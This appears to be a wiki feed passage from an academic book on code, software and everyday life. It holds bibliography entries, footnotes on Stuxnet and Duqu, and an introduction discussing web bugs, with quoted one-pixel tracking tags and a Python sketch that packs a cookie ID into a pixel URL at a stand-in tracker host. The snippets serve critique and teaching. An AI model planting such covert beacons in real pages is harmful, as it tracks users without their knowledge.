Deuze, M., Blank, P. and Speers, L. (2012) A Life Lived in Media, ''Digital Humanities Quarterly'', Winter 2012, Volume 6, Number 1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) Privacy Effects of Web Bugs Amplified by Web 2.0, in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) Counting every moment, ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) The Web Bug FAQ, accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) Duqu Trojan used 'unknown' programming language: Kaspersky, CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) How HP bugged e-mail, accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) How To Manufacture Desire, ''TechCrunch'', accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) Dunn grilled by Congress, accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) The Lifestreams Software Architecture, Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) Welcome to the Yale Lifestreams homepage!, accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) Americans Love Google! Americans Hate Google!, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994) The cyber-road not taken, ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) Time To Start Taking The Internet Seriously, ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) The Many Data Hats a Company can Wear, accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) Ghostrank Planetary System, accessed 02/03/2012, http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) About Ghostery, accessed 02/03/2012, http://www.ghostery.com/about &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) About ChartBeat, accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) Stuxnet/Duqu: The Evolution of Drivers, SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) A Declaration of Cyber-War, ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Haraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis, ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) 'New Stuxnet' worm targets companies in Europe, ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) Stuxnet opens cracks in Iran nuclear program, accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2010) Display Advertising Technology Landscape, accessed 02/03/2012, http://www.lunapartners.com &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. S. (2010) In a Computer Worm, a Possible Biblical Clue, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) The Importance of Philosophy to Engineering, ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web, Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) The Stuxnet Sting, accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) Langner’s Stuxnet Deep Dive S4 Video, accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) Search Engine Use 2012, accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) So What Do We Do With All This Data?, ''The Smithsonian'', accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) Feel. Act. Make sense, accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) Bad Habits? My Future Self Will Deal With That, accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) Tracking Protection Working Group, accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) The Personal Analytics of My Life, accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth, ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies, Locally Stored Objects (LSOs) and Document Object Model storage (DOM storage). &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: “Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity” (Ghostery 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of a virus. Worms spread from computer to computer, often across networks, but unlike a virus a worm has the ability to transfer itself without requiring any human action. It does this by taking advantage of the file- and information-transport features of a computer, such as the networking setup, which it exploits to travel from computer to computer unaided. &lt;br /&gt;
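&lt;br /&gt;
As a toy illustration of this distinction (in Python, with a purely hypothetical network of hosts), a worm-like process spreads along every available link by itself, with no human action required: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# A toy simulation: the worm copies itself to every host reachable
# over the (hypothetical) network links, unaided by any user action.
network = {"A": ["B", "C"], "B": ["C"], "C": []}   # who can reach whom
infected = {"A"}

def worm_step():
    for host in list(infected):
        for neighbour in network[host]:
            infected.add(neighbour)      # self-transfer over the network

worm_step()
print(sorted(infected))                  # ['A', 'B', 'C'] after one sweep
&amp;lt;/pre&amp;gt; &lt;br /&gt;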
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm and careful analysis of the internal data structures and finite state machine used to structure the attack. Ironically, this was then matched by Ralph Langner with photographs that had been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad; the importance of the cascade structure, centrifuge layout and enriching process was confirmed through careful analysis of images accidentally photographed in the background of computers used by the president, see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was on 03/02/2010 (Matrosov et al., n.d.). Although there is suspicion that there may be three versions of the Stuxnet code in response to its discovery: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] There are, though, some criticisms that this link may be spurious; for instance, Cryptome (2010) argues that the &amp;quot;myrtus&amp;quot; string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; may stand for &amp;quot;My-RTUs&amp;quot;, as in Remote Terminal Unit. &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Computational actants, drawing on the notion of the actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4707</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4707"/>
		<updated>2012-04-18T14:29:47Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology that we inhabit. As such we need to take account of this new computational environment and think about how today we live in a highly mediated, code-based world. [Eds: Is there a slippage here from a situation where code and software are 'important', to one in which they form the actual basis of our world, constituting the possibility of human life? Does something need to be said here about the extent to which code and software can be privileged in this respect? For example, why can they be said to constitute the conditions for human living over and above any of the other possible candidates for this role: air, the economy, evolution, the environment, satellites and so on?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which it also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has inevitably [Eds: is its penetration really 'inevitable'?] penetrated more and more into the lifeworld. This has created, and continues to create, specific tensions in relation to old media forms [Eds: should an example be provided of such a tension?], as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. Such tensions relate to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project, a result of the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate. Indeed, as Deuze ''et al.'' have argued:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. [Eds: should some examples of such statistics be provided?] These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers them. &lt;br /&gt;
&lt;br /&gt;
They [Eds: what does this 'they' refer to? Can it be clarified?] also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life would be simply breathtaking [Eds: is this not repeating the 'breathtaking' claim of the previous paragraph?], had we not already discounted and backgrounded their importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane. &lt;br /&gt;
&lt;br /&gt;
Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences [Eds: Above the claim was made that code/software are the conditions of possibility of human life. How, then, can they mediate between us and our experiences if they are what makes 'us' possible? Do they constitute us and our world; do they mediate between us and the world; or do they do both? Does all this need clarifying?], disconnecting the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system. Called ‘fly-by-wire’ in aircraft design, this is in reality the condition of the computational environment we increasingly experience, which I have elsewhere termed ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacrum lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. [Eds: less material than what? Does this need to be explained?] This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind rectangles of glass which yield only to certain prescribed forms of touch-based interface. Here I am thinking of physical keyboards and trackpads, as much as haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. [Eds: At least one of those contained in your book here, F. Frabetti, creates problems for this idea of Hayles' and its too simplistic understanding of code, print, and materiality. Is this something that should be referenced and commented upon?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomenon of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behaviour and send various information about the user back to their servers. &lt;br /&gt;
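&lt;br /&gt;
The mechanism can be sketched very simply: the collected information is typically encoded into the query string of a request for an invisible one-pixel image, so that merely fetching the image delivers the data to the tracker. The following Python fragment is illustrative only, and the endpoint and parameter names are hypothetical: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# Sketch: data is smuggled out in the query string of a pixel request.
from urllib.parse import urlencode

def pixel_url(site, cookie_id, page):
    params = urlencode({"site": site, "uid": cookie_id, "page": page})
    return "http://tracker.example.org/pixel.gif?" + params

# The resulting URL would be embedded in an invisible 1x1 image tag.
print(pixel_url("news-site", "4B31-C2FB", "/world/politics"))
&amp;lt;/pre&amp;gt; &lt;br /&gt;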
&lt;br /&gt;
Originally designed as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘state’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour and collect data and information about users raises important privacy concerns, but it also facilitates the rise of so-called behaviour marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245). &lt;br /&gt;
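&lt;br /&gt;
This underlying 'state management' can be illustrated with Python's standard http.cookies module; the cookie name and value below are invented for the example: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# Sketch of HTTP state management: the server sets a small piece of
# state on the client, which the browser returns on later requests.
from http.cookies import SimpleCookie

outgoing = SimpleCookie()
outgoing["uid"] = "4B31-C2FB-10E2C"              # pseudonymous identifier
outgoing["uid"]["max-age"] = 60 * 60 * 24 * 365  # persist for a year
print(outgoing.output())   # the Set-Cookie header sent to the browser

# On a subsequent visit the browser sends the cookie back, restoring
# the 'state' and allowing the visit to be linked to earlier ones.
incoming = SimpleCookie("uid=4B31-C2FB-10E2C")
print(incoming["uid"].value)
&amp;lt;/pre&amp;gt; &lt;br /&gt;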
&lt;br /&gt;
Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company] it is described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code in the browser without the knowledge of the user – code which, should it be observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999): &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any)&amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;group=register&amp;amp;amp;time=1999.10.27.20.56.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique to reduce the readability of the code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again, Ghostery (2012b) usefully supplies us with some general information on this web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)'; the data is not shared with third parties, but no information is given on data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behaviour, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initiative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online 